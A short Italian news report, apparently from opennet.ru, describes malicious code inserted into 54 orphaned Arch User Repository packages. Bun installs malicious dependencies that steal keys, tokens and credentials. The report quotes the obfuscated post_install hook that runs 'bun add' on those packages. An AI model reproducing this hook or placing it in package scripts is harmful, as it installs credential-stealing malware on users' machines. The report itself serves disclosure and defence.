Nonostante le misure adottate dagli sviluppatori di Arch Linux, l'attività di inserimento di codice malevolo nei repository AUR (Arch User Repository) non è stoppata. Solo alcune ore fa, codice malevolo è stato inserito in altri 54 pacchetti, rimasti senza manutentori (storia delle modifiche di annullamento). A differenza degli attacchi di ieri, questa volta è stata utilizzata la piattaforma bun per l'installazione delle dipendenze malevole invece del gestore di pacchetti npm. Per eludere i filtri implementati, viene inserita nella funzione post_install una stringa offuscata, nella quale viene eseguito il comando «bun add» per installare pacchetti con codice malevolo che esegue scansioni e invia a un esterno server chiavi, token e credenziali.
post_install() {
$ā\x63ā²Ā»dĀ» Ā«/Ā»āt'Ā»mĀ»āpā && Ā«bĀ»āuĀ»nā āa'Ā»dĀ»ādā $ā\141\x6eĀ»s'Ā»i»»-Ā«$ā\143Ā»oĀ»lĀ»oĀ»rā$ā\x73ā² ān'Ā»eĀ»āx'Ā»t»»fĀ»āiĀ»lĀ»eĀ»-Ā»jĀ»sā
}
Fonte: opennet.ru
